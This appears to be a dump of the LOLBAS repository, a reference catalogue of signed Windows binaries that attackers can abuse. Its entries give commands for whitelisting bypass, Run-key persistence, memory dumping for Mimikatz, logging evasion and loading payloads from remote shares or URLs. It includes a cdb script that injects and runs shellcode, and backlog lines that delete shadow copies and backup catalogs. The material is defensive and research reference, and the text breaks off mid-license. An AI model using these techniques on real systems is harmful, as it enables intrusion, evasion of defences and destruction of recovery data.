NLNOTES.EXE /authenticate "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy ) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Run PowerShell via LotusNotes.
```
   
* Resources:   
  * https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
  * https://twitter.com/HanseSecure/status/995578436059127808
   
* Full path:   
  * C:\Program Files (x86)\IBM\Lotus\Notes\Notes.exe
   
* Notes: Thanks to Daniel Bohannon - @danielhbohannon  
   


================================================
FILE: Archive-Old-Version/OtherBinaries/Notes.exe.md
================================================
## Notes.exe
* Functions: Execute
```

Notes.exe "=N:\Lotus\Notes\Data\notes.ini" -Command if((Get-ExecutionPolicy) -ne AllSigned) { Set-ExecutionPolicy -Scope Process Bypass }
Run PowerShell via LotusNotes.
```
   
* Resources:   
  * https://gist.github.com/danielbohannon/50ec800e92a888b7d45486e5733c359f
  * https://twitter.com/HanseSecure/status/995578436059127808
   
* Full path:   
  * C:\Program Files (x86)\IBM\Lotus\Notes\notes.exe
   
* Notes: Thanks to Daniel Bohannon - @danielhbohannon  
   


================================================
FILE: Archive-Old-Version/OtherBinaries/Nvudisp.exe.md
================================================
## Nvudisp.exe
* Functions: Execute, Copy, Add registry, Create shortcut, kill process
```

Nvudisp.exe System calc.exe
Execute calc.exe as a subprocess.

Nvudisp.exe Copy test.txt,test-2.txt
Copy fila A to file B.

Nvudisp.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
Add/Edit a Registry key value.

Nvudisp.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe\","","c:\windows\system32\"
Create shortcut file.

Nvudisp.exe KillApp calculator.exe
Kill a process.

Nvudisp.exe Run foo
Run process
```
   
* Resources:   
  * http://sysadminconcombre.blogspot.ca/2018/04/run-system-commands-through-nvidia.html
   
* Full path:   
  * C:\windows\system32\nvuDisp.exe
   
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken  
   


================================================
FILE: Archive-Old-Version/OtherBinaries/Nvuhda6.exe.md
================================================
## Nvuhda6.exe
* Functions: Execute, Copy, Add registry, Create shortcut, kill process
```

nvuhda6.exe System calc.exe
Execute calc.exe as a subprocess.

nvuhda6.exe Copy test.txt,test-2.txt
Copy fila A to file B.

nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
Add/Edit a Registry key value

nvuhda6.exe CreateShortcut test.lnk,"Test","C:\Windows\System32\calc.exe","","C:\Windows\System32\"
Create shortcut file.

nvuhda6.exe KillApp calc.exe
Kill a process.

nvuhda6.exe Run foo
Run process
```
   
* Resources:   
  * http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
   
* Full path:   
  * Missing
   
* Notes: Thanks to Adam - @hexacorn  
   


================================================
FILE: Archive-Old-Version/OtherBinaries/ROCCAT_Swarm.exe.md
================================================
## ROCCAT_Swarm.exe
* Functions: Execute
```

Replace ROCCAT_Swarm_Monitor.exe with your binary.exe
Hijack ROCCAT_Swarm_Monitor.exe and launch payload when executing ROCCAT_Swarm.exe
```
   
* Resources:   
  * https://twitter.com/pabraeken/status/994213164484001793
   
* Full path:   
  * C:\Program Files (x86)\ROCCAT\ROCCAT Swarm\
   
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken  
   


================================================
FILE: Archive-Old-Version/OtherBinaries/Setup.exe.md
================================================
## Setup.exe
* Functions: Execute
```

Run Setup.exe
Hijack hpbcsiServiceMarshaller.exe and run Setup.exe to launch a payload.
```
   
* Resources:   
  * https://twitter.com/pabraeken/status/994381620588236800
   
* Full path:   
  * C:\LJ-Ent-700-color-MFP-M775-Full-Solution-15315
   
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken  
   


================================================
FILE: Archive-Old-Version/OtherBinaries/Usbinst.exe.md
================================================
## Usbinst.exe
* Functions: Execute
```

Usbinst.exe InstallHinfSection "DefaultInstall 128 c:\temp\calc.inf"
Execute calc.exe through DefaultInstall Section Directive in INF file.
```
   
* Resources:   
  * https://twitter.com/pabraeken/status/993514357807108096
   
* Full path:   
  * C:\Program Files (x86)\Citrix\ICA Client\Drivers64\Usbinst.exe
   
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken  
   


================================================
FILE: Archive-Old-Version/OtherBinaries/VBoxDrvInst.exe.md
================================================
## VBoxDrvInst.exe
* Functions: Persistence
```

VBoxDrvInst.exe driver executeinf c:\temp\calc.inf
Set registry key-value for persistance via INF file call through VBoxDrvInst.exe
```
   
* Resources:   
  * https://twitter.com/pabraeken/status/993497996179492864
   
* Full path:   
  * C:\Program Files\Oracle\VirtualBox Guest Additions
   
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken  
   


================================================
FILE: Archive-Old-Version/OtherMSBinaries/Appvlp.exe.md
================================================
## Appvlp.exe
* Functions: Execute
```

AppVLP.exe \\webdav\calc.bat
Executes calc.bat through AppVLP.exe

AppVLP.exe powershell.exe -c "$e=New-Object -ComObject shell.application;$e.ShellExecute('calc.exe','', '', 'open', 1)"
Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.

AppVLP.exe powershell.exe -c "$e=New-Object -ComObject excel.application;$e.RegisterXLL('\\webdav\xll_poc.xll')"
Executes powershell.exe as a subprocess of AppVLP.exe and run the respective PS command.
```
   
* Resources:   
  * https://github.com/MoooKitty/Code-Execution
  * https://twitter.com/moo_hax/status/892388990686347264
   
* Full path:   
  * C:\Program Files\Microsoft Office\root\client\appvlp.exe
  * C:\Program Files (x86)\Microsoft Office\root\client\appvlp.exe
   
* Notes: Thanks to fab - @0rbz_ (No record), Will - @moo_hax (Code Execution)  
   


================================================
FILE: Archive-Old-Version/OtherMSBinaries/Bginfo.exe.md
================================================
## Bginfo.exe
* Functions: Execute
```

bginfo.exe bginfo.bgi /popup /nolicprompt
Execute VBscript code that is referenced within the bginfo.bgi file.

"\\10.10.10.10\webdav\bginfo.exe" bginfo.bgi /popup /nolicprompt
Execute bginfo.exe from a WebDAV server.

"\\live.sysinternals.com\Tools\bginfo.exe" \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
This style of execution may not longer work due to patch.
```
   
* Resources:   
  * https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/
   
* Full path:   
  * No fixed path
   
* Notes: Thanks to Oddvar Moe - @oddvarmoe  
   


================================================
FILE: Archive-Old-Version/OtherMSBinaries/Cdb.exe.md
================================================
## Cdb.exe
* Functions: Execute
```

cdb.exe -cf x64_calc.wds -o notepad.exe
Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.
```
   
* Resources:   
  * http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html
  * https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options
  * https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda
   
* Full path:   
  * C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe
  * C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe
   
* Notes: Thanks to Matt Graeber - @mattifestation  
   


================================================
FILE: Archive-Old-Version/OtherMSBinaries/Dxcap.exe.md
================================================
## Dxcap.exe
* Functions: Execute
```

Dxcap.exe -c C:\Windows\System32\notepad.exe
Launch notepad as a subprocess of Dxcap.exe
```
   
* Resources:   
  * https://twitter.com/harr0ey/status/992008180904419328
   
* Full path:   
  * c:\Windows\System32\dxcap.exe
  * c:\Windows\SysWOW64\dxcap.exe
   
* Notes: Thanks to Matt harr0ey - @harr0ey  
   


================================================
FILE: Archive-Old-Version/OtherMSBinaries/Mftrace.exe.md
================================================
## Mftrace.exe
* Functions: Execute
```

Mftrace.exe cmd.exe
Launch cmd.exe as a subprocess of Mftrace.exe.

Mftrace.exe powershell.exe
Launch cmd.exe as a subprocess of Mftrace.exe.
```
   
* Resources:   
  * https://twitter.com/0rbz_/status/988911181422186496 (Currently not accessible)
   
* Full path:   
  * C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x86
  * C:\Program Files (x86)\Windows Kits\10\bin\10.0.16299.0\x64
  * C:\Program Files (x86)\Windows Kits\10\bin\x86
  * C:\Program Files (x86)\Windows Kits\10\bin\x64
   
* Notes: Thanks to fabrizio - @0rbz_  
   


================================================
FILE: Archive-Old-Version/OtherMSBinaries/Msdeploy.exe.md
================================================
## Msdeploy.exe
* Functions: Execute
```

msdeploy.exe -verb:sync -source:RunCommand -dest:runCommand="c:\temp\calc.bat"
Launch calc.bat via msdeploy.exe.
```
   
* Resources:   
  * https://twitter.com/pabraeken/status/995837734379032576
   
* Full path:   
  * C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe
   
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken  
   


================================================
FILE: Archive-Old-Version/OtherMSBinaries/Payload/Cdb_calc.wds
================================================
$$ Save this to a file - e.g. x64_calc.wds
$$ Example: launch this shellcode in a host notepad.exe process.
$$ cdb.exe -cf x64_calc.wds -o notepad.exe

$$ Allocate 272 bytes for the shellcode buffer
$$ Save the address of the resulting RWX in the pseudo $t0 register
.foreach /pS 5  ( register { .dvalloc 272 } ) { r @$t0 = register }

$$ Copy each individual shellcode byte to the allocated RWX buffer
$$ Note: The `eq` command could be used to save space, if desired.
$$ Note: .readmem can be used to read a shellcode buffer too but
$$   shellcode on disk will be subject to AV scanning.
;eb @$t0+00 FC;eb @$t0+01 48;eb @$t0+02 83;eb @$t0+03 E4
;eb @$t0+04 F0;eb @$t0+05 E8;eb @$t0+06 C0;eb @$t0+07 00
;eb @$t0+08 00;eb @$t0+09 00;eb @$t0+0A 41;eb @$t0+0B 51
;eb @$t0+0C 41;eb @$t0+0D 50;eb @$t0+0E 52;eb @$t0+0F 51
;eb @$t0+10 56;eb @$t0+11 48;eb @$t0+12 31;eb @$t0+13 D2
;eb @$t0+14 65;eb @$t0+15 48;eb @$t0+16 8B;eb @$t0+17 52
;eb @$t0+18 60;eb @$t0+19 48;eb @$t0+1A 8B;eb @$t0+1B 52
;eb @$t0+1C 18;eb @$t0+1D 48;eb @$t0+1E 8B;eb @$t0+1F 52
;eb @$t0+20 20;eb @$t0+21 48;eb @$t0+22 8B;eb @$t0+23 72
;eb @$t0+24 50;eb @$t0+25 48;eb @$t0+26 0F;eb @$t0+27 B7
;eb @$t0+28 4A;eb @$t0+29 4A;eb @$t0+2A 4D;eb @$t0+2B 31
;eb @$t0+2C C9;eb @$t0+2D 48;eb @$t0+2E 31;eb @$t0+2F C0
;eb @$t0+30 AC;eb @$t0+31 3C;eb @$t0+32 61;eb @$t0+33 7C
;eb @$t0+34 02;eb @$t0+35 2C;eb @$t0+36 20;eb @$t0+37 41
;eb @$t0+38 C1;eb @$t0+39 C9;eb @$t0+3A 0D;eb @$t0+3B 41
;eb @$t0+3C 01;eb @$t0+3D C1;eb @$t0+3E E2;eb @$t0+3F ED
;eb @$t0+40 52;eb @$t0+41 41;eb @$t0+42 51;eb @$t0+43 48
;eb @$t0+44 8B;eb @$t0+45 52;eb @$t0+46 20;eb @$t0+47 8B
;eb @$t0+48 42;eb @$t0+49 3C;eb @$t0+4A 48;eb @$t0+4B 01
;eb @$t0+4C D0;eb @$t0+4D 8B;eb @$t0+4E 80;eb @$t0+4F 88
;eb @$t0+50 00;eb @$t0+51 00;eb @$t0+52 00;eb @$t0+53 48
;eb @$t0+54 85;eb @$t0+55 C0;eb @$t0+56 74;eb @$t0+57 67
;eb @$t0+58 48;eb @$t0+59 01;eb @$t0+5A D0;eb @$t0+5B 50
;eb @$t0+5C 8B;eb @$t0+5D 48;eb @$t0+5E 18;eb @$t0+5F 44
;eb @$t0+60 8B;eb @$t0+61 40;eb @$t0+62 20;eb @$t0+63 49
;eb @$t0+64 01;eb @$t0+65 D0;eb @$t0+66 E3;eb @$t0+67 56
;eb @$t0+68 48;eb @$t0+69 FF;eb @$t0+6A C9;eb @$t0+6B 41
;eb @$t0+6C 8B;eb @$t0+6D 34;eb @$t0+6E 88;eb @$t0+6F 48
;eb @$t0+70 01;eb @$t0+71 D6;eb @$t0+72 4D;eb @$t0+73 31
;eb @$t0+74 C9;eb @$t0+75 48;eb @$t0+76 31;eb @$t0+77 C0
;eb @$t0+78 AC;eb @$t0+79 41;eb @$t0+7A C1;eb @$t0+7B C9
;eb @$t0+7C 0D;eb @$t0+7D 41;eb @$t0+7E 01;eb @$t0+7F C1
;eb @$t0+80 38;eb @$t0+81 E0;eb @$t0+82 75;eb @$t0+83 F1
;eb @$t0+84 4C;eb @$t0+85 03;eb @$t0+86 4C;eb @$t0+87 24
;eb @$t0+88 08;eb @$t0+89 45;eb @$t0+8A 39;eb @$t0+8B D1
;eb @$t0+8C 75;eb @$t0+8D D8;eb @$t0+8E 58;eb @$t0+8F 44
;eb @$t0+90 8B;eb @$t0+91 40;eb @$t0+92 24;eb @$t0+93 49
;eb @$t0+94 01;eb @$t0+95 D0;eb @$t0+96 66;eb @$t0+97 41
;eb @$t0+98 8B;eb @$t0+99 0C;eb @$t0+9A 48;eb @$t0+9B 44
;eb @$t0+9C 8B;eb @$t0+9D 40;eb @$t0+9E 1C;eb @$t0+9F 49
;eb @$t0+A0 01;eb @$t0+A1 D0;eb @$t0+A2 41;eb @$t0+A3 8B
;eb @$t0+A4 04;eb @$t0+A5 88;eb @$t0+A6 48;eb @$t0+A7 01
;eb @$t0+A8 D0;eb @$t0+A9 41;eb @$t0+AA 58;eb @$t0+AB 41
;eb @$t0+AC 58;eb @$t0+AD 5E;eb @$t0+AE 59;eb @$t0+AF 5A
;eb @$t0+B0 41;eb @$t0+B1 58;eb @$t0+B2 41;eb @$t0+B3 59
;eb @$t0+B4 41;eb @$t0+B5 5A;eb @$t0+B6 48;eb @$t0+B7 83
;eb @$t0+B8 EC;eb @$t0+B9 20;eb @$t0+BA 41;eb @$t0+BB 52
;eb @$t0+BC FF;eb @$t0+BD E0;eb @$t0+BE 58;eb @$t0+BF 41
;eb @$t0+C0 59;eb @$t0+C1 5A;eb @$t0+C2 48;eb @$t0+C3 8B
;eb @$t0+C4 12;eb @$t0+C5 E9;eb @$t0+C6 57;eb @$t0+C7 FF
;eb @$t0+C8 FF;eb @$t0+C9 FF;eb @$t0+CA 5D;eb @$t0+CB 48
;eb @$t0+CC BA;eb @$t0+CD 01;eb @$t0+CE 00;eb @$t0+CF 00
;eb @$t0+D0 00;eb @$t0+D1 00;eb @$t0+D2 00;eb @$t0+D3 00
;eb @$t0+D4 00;eb @$t0+D5 48;eb @$t0+D6 8D;eb @$t0+D7 8D
;eb @$t0+D8 01;eb @$t0+D9 01;eb @$t0+DA 00;eb @$t0+DB 00
;eb @$t0+DC 41;eb @$t0+DD BA;eb @$t0+DE 31;eb @$t0+DF 8B
;eb @$t0+E0 6F;eb @$t0+E1 87;eb @$t0+E2 FF;eb @$t0+E3 D5
;eb @$t0+E4 BB;eb @$t0+E5 E0;eb @$t0+E6 1D;eb @$t0+E7 2A
;eb @$t0+E8 0A;eb @$t0+E9 41;eb @$t0+EA BA;eb @$t0+EB A6
;eb @$t0+EC 95;eb @$t0+ED BD;eb @$t0+EE 9D;eb @$t0+EF FF
;eb @$t0+F0 D5;eb @$t0+F1 48;eb @$t0+F2 83;eb @$t0+F3 C4
;eb @$t0+F4 28;eb @$t0+F5 3C;eb @$t0+F6 06;eb @$t0+F7 7C
;eb @$t0+F8 0A;eb @$t0+F9 80;eb @$t0+FA FB;eb @$t0+FB E0
;eb @$t0+FC 75;eb @$t0+FD 05;eb @$t0+FE BB;eb @$t0+FF 47
;eb @$t0+100 13;eb @$t0+101 72;eb @$t0+102 6F;eb @$t0+103 6A
;eb @$t0+104 00;eb @$t0+105 59;eb @$t0+106 41;eb @$t0+107 89
;eb @$t0+108 DA;eb @$t0+109 FF;eb @$t0+10A D5;eb @$t0+10B 63
;eb @$t0+10C 61;eb @$t0+10D 6C;eb @$t0+10E 63;eb @$t0+10F 00

$$ Redirect execution to the shellcode buffer
r @$ip=@$t0

$$ Continue program execution - i.e. execute the shellcode
g

$$ Continue program execution after hitting a breakpoint
$$ upon starting calc.exe. This is specific to this shellcode.
g

$$ quit cdb.exe
q

================================================
FILE: Archive-Old-Version/OtherMSBinaries/SQLToolsPS.exe.md
================================================
## SQLToolsPS.exe
* Functions: Execute, evade logging
```

SQLToolsPS.exe -noprofile -command Start-Process calc.exe
Run PowerShell scripts and commands.
```
   
* Resources:   
  * https://twitter.com/pabraeken/status/993298228840992768
   
* Full path:   
  * C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
   
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken  
   


================================================
FILE: Archive-Old-Version/OtherMSBinaries/Sqldumper.exe.md
================================================
## Sqldumper.exe
* Functions: Dump process
```

sqldumper.exe 464 0 0x0110
Dump process by PID and create a dump file (Appears to create a dump file called SQLDmprXXXX.mdmp).

sqldumper.exe 540 0 0x01100:40
0x01100:40 flag will create a Mimikatz compatibile dump file.
```
   
* Resources:   
  * https://twitter.com/countuponsec/status/910969424215232518
  * https://twitter.com/countuponsec/status/910977826853068800
  * https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se
   
* Full path:   
  * C:\Program Files\Microsoft SQL Server\90\Shared\SQLDumper.exe
  * C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis\AS OLEDB\140\SQLDumper.exe
   
* Notes: Thanks to Luis Rocha - @countuponsec  
   


================================================
FILE: Archive-Old-Version/OtherMSBinaries/Sqlps.exe.md
================================================
## Sqlps.exe
* Functions: Execute, evade logging
```

Sqlps.exe -noprofile
Drop into a SQL Server PowerShell console without Module and ScriptBlock Logging.
```
   
* Resources:   
  * https://twitter.com/bryon_/status/975835709587075072
   
* Full path:   
  * C:\Program files (x86\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
   
* Notes: Thanks to Bryon - @bryon_  
   


================================================
FILE: Archive-Old-Version/OtherMSBinaries/Tracker.exe.md
================================================
## Tracker.exe
* Functions: Execute
```

Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
```
   
* Resources:   
  * https://twitter.com/subTee/status/793151392185589760
  * https://attack.mitre.org/wiki/Execution
   
* Full path:   
  * 
   
* Notes: Thanks to Casey Smith - @subTee  
   


================================================
FILE: Archive-Old-Version/OtherMSBinaries/csi.exe.md
================================================
## csi.exe
* Functions: Execute
```

csi.exe file
Use csi.exe to run unsigned C# code.
```
   
* Resources:   
  * https://twitter.com/subTee/status/781208810723549188
  * https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
   
* Full path:   
  * c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
  * c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
   
* Notes: Thanks to Casey Smith - @subtee  
   


================================================
FILE: Archive-Old-Version/OtherMSBinaries/dnx.exe.md
================================================
## dnx.exe
* Functions: Execute
```

dnx.exe consoleapp
Execute C# code located in the consoleapp folder via 'Program.cs' and 'Project.json' (Note - Requires dependencies)
```
   
* Resources:   
  * https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/
   
* Full path:   
  * N/A
   
* Notes: Thanks to Matt Nelson - @enigma0x3  
   


================================================
FILE: Archive-Old-Version/OtherMSBinaries/msxsl.exe.md
================================================
## msxsl.exe
* Functions: Execute
```

msxsl.exe customers.xml script.xsl
Run COM Scriptlet code within the script.xsl file (local).

msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
```
   
* Resources:   
  * https://twitter.com/subTee/status/877616321747271680
  * https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker
   
* Full path:   
  * N/A
   
* Notes: Thanks to Casey Smith - @subTee (Finding), 3gstudent - @3gstudent (Remote)  
   


================================================
FILE: Archive-Old-Version/OtherMSBinaries/rcsi.exe.md
================================================
## rcsi.exe
* Functions: Execute
```

rcsi.exe bypass.csx
Use embedded C# within the csx script to execute the code.
```
   
* Resources:   
  * https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/
   
* Full path:   
  * 
   
* Notes: Thanks to Matt Nelson - @enigma0x3  
   


================================================
FILE: Archive-Old-Version/OtherMSBinaries/te.exe.md
================================================
## te.exe
* Functions: Execute
```

te.exe bypass.wsc
Run COM Scriptlets (e.g. VBScript) by calling a Windows Script Component (WSC) file.
```
   
* Resources:   
  * https://twitter.com/gn3mes1s/status/927680266390384640?lang=bg
   
* Full path:   
  * 
   
* Notes: Thanks to Giuseppe N3mes1s - @gN3mes1s  
   


================================================
FILE: Archive-Old-Version/OtherMSBinaries/vsjitdebugger.exe.md
================================================
## vsjitdebugger.exe
* Functions: Execute
```

Vsjitdebugger.exe calc.exe
Executes calc.exe as a subprocess of Vsjitdebugger.exe.
```
   
* Resources:   
  * https://twitter.com/pabraeken/status/990758590020452353
   
* Full path:   
  * c:\windows\system32\vsjitdebugger.exe
   
* Notes: Thanks to Pierre-Alexandre Braeken - @pabraeken  
   


================================================
FILE: Archive-Old-Version/OtherMSBinaries/winword.exe.md
================================================
## winword.exe
* Functions: Execute
```

winword.exe /l dllfile.dll
Launch DLL payload.
```
   
* Resources:   
  * https://twitter.com/vysecurity/status/884755482707210241
  * https://twitter.com/Hexacorn/status/885258886428725250
   
* Full path:   
  * c:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
   
* Notes: Thanks to Vincent Yiu - @@vysecurity (Cmd), Adam - @Hexacorn (Internals)  
   


================================================
FILE: Archive-Old-Version/OtherScripts/testxlst.js.md
================================================
## testxlst.js
* Functions: Execute
```

cscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
Test Jscript included in Python tool to perform XSL transform (for payload execution).

wscript testxlst.js C:\test\test.xml c:\test\test.xls c:\test\test.out
Test Jscript included in Python tool to perform XSL transform (for payload execution).
```
   
* Resources:   
  * https://twitter.com/bohops/status/993314069116485632
   
* Full path:   
  * c:\python27amd64\Lib\site-packages\win32com\test\testxslt.js (Visual Studio Installation)
   
* Notes: Thanks to Jimmy - @bohops  
   


================================================
FILE: Backlog.txt
================================================
Ntsd.exe		Debugger
Kd.exe			Debugger
Certreq.exe		Exfiltrate data
Dbghost.exe
Robocopy.exe	Needs examples
Vssadmin.exe	vssadmin.exe Delete Shadows /All /Quiet
notepad.exe		Gui - Download files using Open (A lot of other programs as well) LOLGuiBins?
wbadmin.exe 	wbadmin delete catalog -quiet
psexec.exe		Remote execution of code
java.exe		-agentpath:<dllname_with_dll_extension>  or   -agentlib:<dllname>
WinMail.exe		DLL Sideloading
odbcad32.exe	GUI DLL Loading
WseClientSvc.exe	- https://blog.huntresslabs.com/abusing-trusted-applications-a719219220f
dvdplay.exe		http://www.hexacorn.com/blog/2018/03/15/beyond-good-ol-run-key-part-73/
http://www.hexacorn.com/blog/category/living-off-the-land/pass-thru-command-execution/
https://twitter.com/Hexacorn/status/993498264497541120
https://twitter.com/Hexacorn/status/994000792628719618
https://github.com/MoooKitty/Code-Execution


================================================
FILE: CONTRIBUTING.md
================================================
# Contributing

First, thank you for contributing!

When submitting new LOLs, please submit a `yml` sourcefile (`yml/`) as these are used to generate everything else. Next, review `README.md` and ensure that your LOL meets the criteria--interesting or unexpected functionality that would be useful to an attacker.

There's nothing special about the format. Just base your entry off an existing one and modify as required. Please ensure that you do not add or remove any of the fields; all are required.   

There is a template that can be used located here if you do not want to copy one of the existing LOLs: https://github.com/LOLBAS-Project/LOLBAS/blob/master/YML-Template.yml   
It is also important to use these (https://github.com/LOLBAS-Project/LOLBAS/blob/master/CategoryList.md) categories, since they relate to the web portal and it is crucial to get them right for everything to work.

Looking forward for your contributions. 


================================================
FILE: CategoryList.md
================================================
CATEGORY LIST

ADS   
AWL bypass   
Compile   
Conceal   
Copy   
Credentials   
Decode   
Download   
Dump   
Encode   
Execute   
Reconnaissance   
Tamper   
UAC bypass   
Upload   


================================================
FILE: LICENSE
================================================
                    GNU GENERAL PUBLIC LICENSE
                       Version 3, 29 June 2007

 Copyright (C) 2007 Free Software Foundation, Inc. <https://fsf.org/>
 Everyone is permitted to copy and distribute verbatim copies
 of this license document, but changing it is not allowed.

                            Preamble

  The GNU General Public License is a free, copyleft license for
software and other kinds of works.

  The licenses for most software and other practical works are designed
to take away your freedom to share and change the works.  By contrast,
the GNU General Public License is intended to guarantee your freedom to
share and change all versions of a program--to make sure it remains free
software for all its users.  We, the Free Software Foundation, use the
GNU General Public License for most of our software; it applies also to
any other work released this way by its authors.  You can apply it to
your programs, too.

  When we speak of free software, we are referring to freedom, not
price.  Our General Public Licenses are designed to make sure that you
have the freedom to distribute copies of free software (and charge for
them if you wish), that you receive source code or can get it if you
want it, that you can change the software or use pieces of it in new
free programs, and that you know you can do these things.

  To protect your rights, we need to prevent others from denying you
these rights or asking you to surrender the rights.  Therefore, you have
certain responsibilities if you distribute copies of the software, or if
you modify it: responsibilities to respect the freedom of others.

  For example, if you distribute copies of such a program, whether
gratis or for a fee, you must pass on to the recipients the same
freedoms that you received.  You must make sure that they, too, receive
or can get the source code.  And you must show them these terms so they
know their rights.

  Developers that use the GNU GPL protect your rights with two steps:
(1) assert copyright on the software, and (2) offer you this License
giving you legal permission to copy, distribute and/or modify it.

  For the developers' and authors' protection, the GPL clearly explains
that there is no warranty for this free software.  For both users' and
authors' sake, the GPL requires that modified versions be marked as
changed, so that their problems will not be attributed erroneously to
authors of previous versions.

  Some devices are designed to deny users access to install or run
modified versions of the software inside them, although the manufacturer
can do so.  This is fundamentally incompatible with the aim of
protecting users' freedom to change the software.  The systematic
pattern of such abuse occurs in the area of products for individuals to
use, which is precisely where it is most unacceptable.  Therefore, we
have designed this version of the GPL to prohibit the practice for those
products.  If such problems arise substantially in other domains, we
stand ready to extend this provision to those domains in future versions
of the GPL, as needed to protect the freedom of users.

  Finally, every program is threatened constantly by software patents.
States should not allow patents to restrict development and use of
software on general-purpose computers, but in those that do, we wish to
avoid the special danger that patents applied to a free program could
make it effectively proprietary.  To prevent this, the GPL assures that
patents cannot be used to render the program non-free.

  The precise terms and conditions for copying, distribution and
modification follow.

                       TERMS AND CONDITIONS

  0. Definitions.

  "This License" refers to version 3 of the GNU General Public License.

  "Copyright" also means copyright-like laws that apply to other kinds of
works, such as semiconductor masks.

  "The Program" refers to any copyrightable work licensed under this
License.  Each licensee is addressed as "you".  "Licensees" and
"recipients" may be individuals or organizations.

  To "modify" a work means to copy from or adapt all or part of the work
in a fashion requiring copyright permission, other than the making of an
exact copy.  The resulting work is called a "modified version" of the
earlier work or a work "based on" the earlier work.

  A "covered work" means either the unmodified Program or a work based
on the Program.

  To "propagate" a work means to do anything with it that, without
permission, would make you directly or secondarily liable for
infringement under applicable copyright law, except executing it on a
computer or modifying a private copy.  Propagation includes copying,
distribution (with or without modification), making available to the
public, and in some countries other activities as well.

  To "convey" a work means any kind of propagation that enables other
parties to make or receive copies.  Mere interaction with a user through
a computer network, with no transfer of a copy, is not conveying.

  An interactive user interface displays "Appropriate Legal Notices"
to the extent that it includes a convenient and prominently visible
feature that (1) displays an appropriate copyright notice, and (2)
tells the user that there is no warranty for the work (except to the
extent that warranties are provided), that licensees may convey the
work under this License, and how to view a copy of this License.  If
the interface presents a list of user commands or options, such as a
menu, a prominent item in the list meets this criterion.

  1. Source Code.

  The "source code" for a work means the preferred form of the work
for making modifications to it.  "Object code" means any non-source
form of a work.

  A "Standard Interface" means an interface that either is an official
standard defined by a recognized standards body, or, in the case of
interfaces specified for a particular programming language, one that
is widely used among developers working in that language.

  The "System Libraries" of an executable work include anything, other
than the work as a whole, that (a) is included in the normal form of
packaging a Major Component, but which is not part of that Major
Component, and (b) serves only to enable use of the work with that
Major Component, or to implement a Standard Interface for which an
implementation is available to the public in source code form.  A
"Major Component", in this context, means a major essential component
(kernel, window system, and so on) of the specific operating system
(if any) on which the executable work runs, or a compiler used to
produce the work, or an object code interpreter used to run it.

  The "Corresponding Source" for a work in object code form means all
the source code needed to generate, install, and (for an executable
work) run the object code and to modify the work, including scripts to
control those activities.  However, it does not include the work's
System Libraries, or general-purpose tools or generally available free
programs which are used unmodified in performing those activities but
which are not part of the work.  For example, Corresponding Source
includes interface definition files associated with source files for
the work, and the source code for shared libraries and dynamically
linked subprograms that the work is specifically designed to require,
such as by intimate data communication or control flow between those
subprograms and other parts of the work.

  The Corresponding Source need not include anything that users
can regenerate automatically from other parts of the Corresponding
Source.

  The Corresponding Source for a work in source code form is that
same work.

  2. Basic Permissions.

  All rights granted under this License are granted for the term of
copyright on the Program, and are irrevocable provided the stated
conditions are met.  This License explicitly affirms your unlimited
permission to run the unmodified Program.  The output from running a
covered work is covered by this License only if the output, given its
content, constitutes a covered work.  This License acknowledges your
rights of fair use or other equivalent, as provided by copyright law.

  You may make, run and propagate covered works that you do not
convey, without conditions so long as your license otherwise remains
in force.  You may convey covered works to others for the sole purpose
of having them make modifications exclusively for you, or provide you
with facilities for running those works, provided that you comply with
the terms of this License in conveying all material for which you do
not control copyright.  Those thus making or running the covered works
for you must do so exclusively on your behalf, under your direction
and control, on terms that prohibit them from making any copies of
your copyrighted material outside their relationship with you.

